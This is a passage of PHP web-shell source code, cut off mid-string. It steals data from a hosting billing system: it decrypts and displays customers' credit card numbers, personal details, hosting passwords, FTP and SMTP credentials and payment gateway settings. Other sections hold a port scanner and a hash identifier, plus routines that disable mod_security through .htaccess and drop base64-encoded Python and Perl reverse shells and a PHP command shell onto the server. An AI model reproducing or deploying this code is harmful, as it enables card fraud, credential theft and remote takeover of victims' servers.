"; $query = mysql_query("SELECT *FROM tblregistrars"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash); echo ""; } echo "
DOMAIN REGISTRAR
REGISTRAR SETTING VALUE
Nothing Found !
{$v['registrar']} {$v['setting']} $value
"; $query = mysql_query("SELECT * FROM tblconfiguration where 1"); echo "

"; $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination'); if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($row = mysql_fetch_array($query)) { if ($row[setting] == $ftpb[0]) { echo ""; $ftpb[0] = xxx; } elseif ($row[setting] == $ftpb[1]) { echo ""; $ftpb[1] = xxx; } elseif ($row[setting] == $ftpb[2]) { echo ""; $ftpb[2] = xxx; } elseif ($row[setting] == $ftpb[3]) { echo ""; $ftpb[3] = xxx; } } echo "
FTP BACKUP
FTP HOSTNAME FTP USERNAME FTP PASSWORD DESTINATION
Nothing Found ! :(
{$row[value]}{$row[value]}{$row[value]}{$row[value]}
"; $query = mysql_query("SELECT * FROM tblconfiguration where 1"); echo "

"; $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort'); if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($row = mysql_fetch_array($query)) { if ($row[setting] == $smtp[0]) { echo ""; $smtp[0] = xxx; } elseif ($row[setting] == $smtp[1]) { echo ""; $smtp[1] = xxx; } elseif ($row[setting] == $smtp[2]) { echo ""; $smtp[2] = xxx; } elseif ($row[setting] == $smtp[3]) { echo ""; $smtp[3] = xxx; } } echo "
SMTP SERVER
SMTP HOST SMTP USER SMTP PASS SMTP PORT
Nothing Found ! :(
{$row[value]}{$row[value]}{$row[value]}{$row[value]}
"; $query = mysql_query("SELECT *FROM tblpaymentgateways"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { echo ""; } echo "
PAYMENTS GATEWAY
GATEWAY SETTING VALUE ORDER
Nothing Found !
{$v['gateway']} {$v['setting']} {$v['value']} {$v['order']}
"; $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { $cchash = md5($cc_encryption_hash . $v['0']); $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'"); $v2 = mysql_fetch_array($s); echo ""; } echo "
CLIENTS CREDIT CARD
CardType CardNumb Expdate IssueNumber FirstName LastName Address Country Phone Email
Nothing Found ! :(
" . $v2['cardtype'] . " " . $v2['cardnum'] . " " . $v2['expdate'] . " " . $v2['issuenumber'] . " " . $v2['firstname'] . " " . $v2['lastname'] . " " . $v2['address1'] . " " . $v2['country'] . " " . $v2['phonenumber'] . " " . $v2['email'] . "
"; $query = mysql_query("SELECT *FROM tblhosting"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { echo ""; } echo "
CLIENTS HOSTING ACCOUNT
DOMAIN STATUS USERNAME PASSWORD DEDICATED IP ASSIGNED IP
Nothing Found !
{$v['domain']} {$v['domainstatus']} {$v['username']} " . dec($v['password'], $cc_encryption_hash) . " {$v['dedicatedip']} {$v['assignedips']}
"; } } elseif($_GET['do'] == 'hash') { echo "
"; echo ""; echo "
"; if (isset($_POST['gethash'])) { $hash = $_POST['hash']; if (strlen($hash) == 32) { $hashresult = "MD5 Hash"; } elseif (strlen($hash) == 40) { $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; } elseif (strlen($hash) == 13) { $hashresult = "DES(Unix) Hash"; } elseif (strlen($hash) == 16) { $hashresult = "MySQL Hash / /DES(Oracle Hash)"; } elseif (strlen($hash) == 41) { $GetHashChar = substr($hash, 40); if ($GetHashChar == "*") { $hashresult = "MySQL5 Hash"; } } elseif (strlen($hash) == 64) { $hashresult = "SHA-256 Hash"; } elseif (strlen($hash) == 96) { $hashresult = "SHA-384 Hash"; } elseif (strlen($hash) == 128) { $hashresult = "SHA-512 Hash"; } elseif (strlen($hash) == 34) { if (strstr($hash, '$1$')) { $hashresult = "MD5(Unix) Hash"; } } elseif (strlen($hash) == 37) { if (strstr($hash, '$apr1$')) { $hashresult = "MD5(APR) Hash"; } } elseif (strlen($hash) == 34) { if (strstr($hash, '$H$')) { $hashresult = "MD5(phpBB3) Hash"; } } elseif (strlen($hash) == 34) { if (strstr($hash, '$P$')) { $hashresult = "MD5(Wordpress) Hash"; } } elseif (strlen($hash) == 39) { if (strstr($hash, '$5$')) { $hashresult = "SHA-256(Unix) Hash"; } } elseif (strlen($hash) == 39) { if (strstr($hash, '$6$')) { $hashresult = "SHA-512(Unix) Hash"; } } elseif (strlen($hash) == 24) { if (strstr($hash, '==')) { $hashresult = "MD5(Base-64) Hash"; } } else { $hashresult = "Hash type not found"; } } else { $hashresult = "
Not Hash Entered
"; } echo"
Hash Identification

Enter Hash :

Result:
"; echo "
$hashresult
"; } elseif($_GET['do'] == 'portsc') { echo "
"; echo ""; echo "
"; echo"
" ; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) { for ($i = $start;$i <= $end;$i++) { $fp = @fsockopen($host, $i, $errno, $errstr, 3); if ($fp) { echo 'Port ' . $i . ' is open
'; } flush(); } } else { echo '
Port Scanner
Host
Port start
Port end
'; } } elseif($_GET['do'] == 'ptbc') { echo "
"; echo ""; echo "
"; mkdir('pyrevrshell', 0755); chdir('pyrevrshell'); $seropil = ".htaccess"; $angelinalll = "$seropil"; $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz açılamadı!"); $dffvfdgfg = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $shitttyz , $dffvfdgfg ) ; fclose ($shitttyz); //extract python reverse script $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ=='; $jkol = fopen("reversesh.py" ,"w+"); $write = fwrite ($jkol ,base64_decode($vkffhd)); fclose($jkol); chmod("reversesh.py",0755); //extract php command shell $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50ICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWdyYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMnB0Ij5Vc2FnZTogcmV2ZXJzZXNoLnB5IFtpcG11XSBbUG9ydG11XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCI+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHB5dGhvbiBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcHl0aG9uIHJldmVyc2UucHkgeW91cklQIFBvcnQ8L3N0cm9uZz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0idnciIHNpemU9IjUwIiB2YWx1ZT0iY21kIj4gPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIHNpemU9IjQzIj4gPHNlbGVjdCBuYW1lPWV4ZWNtZXRob2Q+DQo8b3B0aW9uIHZhbHVlPSJzeXN0ZW0iPlN5c3RlbTwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0iZXhlYyI+RXhlYzwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPlBhc3N0aHJ1PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT0icG9wZW4iPnBvcGVuPC9vcHRpb24+DQo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9wPjwvZm9ybT4nOw0KPz4='; $file = fopen("kiter.php" ,"w+"); $write = fwrite ($file ,base64_decode($merdeeeee)); fclose($file); echo '
Python Connect Shell Priv8

'; } elseif($_GET['do'] == 'pbc') { echo "
"; echo ""; echo "
"; mkdir('Backperlrev', 0755); chdir('Backperlrev'); $kokwkwkwkwkw = ".htaccess"; $wkwkwkwkw_adi = "$kokwkwkwkwkw"; $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw açılamadı!"); $zilzil = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $wkwkwkwkw , $zilzil ) ; fclose ($wkwkwkwkw); $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw=='; $zerer = fopen("reverse.pl" ,"w+"); $write = fwrite ($zerer ,base64_decode($shellololol)); fclose($zerer); chmod("reverse.pl",0755); //extract php command shell $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudCAhaW1wb3J0YW50OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDt9ICAgICAgYXt0ZXh0LWRlY29yYXRpb246bm9uZTsgZm9udC1mYW1pbHk6IFRhaG9tYSwgR2VuZXZhOyBjb2xvcjojMDA3NzAwOyBwYWRkaW5nOjJweCAycHg7fSAgICAgIGE6aG92ZXJ7Y29sb3I6IzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwZmYwMCAwcHggMHB4IDNweDt9CSAgLmFyZWEgeyBjb2xvcjogIzAwYmIwMDsgZm9udC1zaXplOiA5cHQ7IHRleHQtc2hhZG93OiMwMDAwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogc29saWQgMHB4ICMwMDc3MDA7IGJhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDk5MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7IH0JICBpbnB1dFt0eXBlPXN1Ym1pdF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDc3MDsgIGZvbnQtd2VpZ2h0OiBib2xkOyB0ZXh0LWFsaWduOiBjZW50ZXI7ICB0ZXh0LXNoYWRvdzogMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOyAgYmFja2dyb3VuZDogI2FlYWVhZTsgIGJhY2tncm91bmQtY2xpcDogcGFkZGluZy1ib3g7ICBib3JkZXI6IDFweCBzb2xpZCAjMjg0NDczOyAgYm9yZGVyLWJvdHRvbS1jb2xvcjogIzIyM2I2NjsgIGJvcmRlci1yYWRpdXM6IDRweDsgIGN1cnNvcjogcG9pbnRlcjsgIGJhY2tncm91bmQtaW1hZ2U6LXdlYmtpdC1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1tb3otbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtby1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IGxpbmVhci1ncmFkaWVudCh0byBib3R0b20sICNlYWVhZWEsICNkMGQwZDApOyAgLXdlYmtpdC1ib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgIGJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyB9IGlucHV0W3R5cGU9dGV4dF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiAjNzc3Nzc3IDBweCAwcHggM3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwNzcwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4O30gaW5wdXRbdHlwZT1zdWJtaXRdOmhvdmVyLCBpbnB1dFt0eXBlPXRleHRdOmhvdmVyeyBjb2xvcjogI2ZmZmZmZjsgdGV4dC1zaGFkb3c6ICMwMDY2MDAgMHB4IDBweCA0cHg7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9IHNlbGVjdHsgcGFkZGluZzogM3B4OyB3aWR0aDogMTYycHg7IGNvbG9yOiAjMDBhYTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBhYTAwOyAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDt9IHNlbGVjdDpob3ZlcnsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSAgICNjb21tYW5kc3sgbWFyZ2luLWxlZnQ6IDM1MHB4OyBtYXJnaW4tcmlnaHQ6IDM1MHB4OyB9IG9wdGlvbnsgY29sb3I6ICM3Nzc3Nzc7IH08L3N0eWxlPg0KPD9waHANCmVjaG8gJ